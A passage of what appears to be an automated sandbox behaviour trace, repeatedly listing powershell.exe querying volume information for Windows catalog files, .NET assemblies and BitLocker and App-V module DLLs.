                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
